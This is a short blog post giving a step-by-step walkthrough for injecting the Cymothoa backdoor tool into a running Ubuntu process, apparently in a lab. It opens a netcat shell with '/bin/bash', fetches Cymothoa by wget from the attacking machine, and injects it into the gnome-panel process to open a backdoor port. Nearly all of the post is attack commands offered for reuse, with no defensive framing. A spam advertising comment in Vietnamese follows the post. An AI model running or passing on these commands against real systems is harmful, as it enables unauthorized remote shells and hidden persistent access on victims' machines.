Wednesday, February 1, 2012

Injecting Cymothoa to Ubuntu using Netcat

So, in my other post we've been learned how to inject cymothoa to ubuntu using the web server to transfer the cymothoa. In this post I'll try to explain how to transfer and injecting cymothoa using Netcat.

Okay, lets get started.

1. Start up your ubuntu.

2. Start the nc server on the ubuntu
# nc -l -p 4321 -e /bin/bash


3. Connect to the nc server using backtrack
# nc 192.168.56.101 4321

4. Test if the connection is working in backtrack
# ls

5. Lets transfer cymothoa to ubuntu
Because I have copied cymothoa to /var/www then in ubuntu i just execute this command to download cymothoa.
# wget 192.168.56.1/cymothoa

6. See the process running.
# ps -ax

7. Choose what process will be injected with cymothoa. In this example I'll chose gnome-panel with a PID 1155 to be injected.
8. Execute the command in backtrack
# ./cymothoa -p 1155 -s 0 -y 5678

Ok, mission accomplished. Process Injected..   


"the quieter you become, the more you are able to hear.."

1 comments:

Quảng Cáo Đại Phát said...

Công ty Quảng Cáo Đại Phát chuyên nhận thi công:
làm bảng hiệu
làm hộp đèn quảng cáo
làm biển quảng cáo
làm biển hiệu quảng cáo
làm bảng hiệu quảng cáo
làm bảng hiệu hộp đèn
hộp đèn bảng hiệu
bảng hiệu mica
làm bảng hiệu mica
bảng hiệu quảng cáo
biển hiệu quảng cáo
bảng hiệu quảng cáo đẹp
bảng hiệu đẹp
bảng hiệu hộp đèn
bảng hiệu hộp đèn đẹp
hộp đèn
hộp đèn quảng cáo
hộp đèn quảng cáo đẹp
hộp đèn quảng cáo ngoài trời
hộp đèn quảng cáo mica

Lí do để bảng hiệu quảng cáo được ưa chuộng bậc nhất trong các hình thức quảng cáo là bởi nó đem lại rất nhiều lợi ích:
Giá cả hợp lý
Tạo sự thu hút ngay lập tức đối với khách hàng
Cung cấp đầy đủ thông tin mà các doanh nghiệp, cửa hàng quán xá muốn khách hàng biết
Dễ dàng quan sát
Phù hợp với nhiều mục đích sử dụng

Post a Comment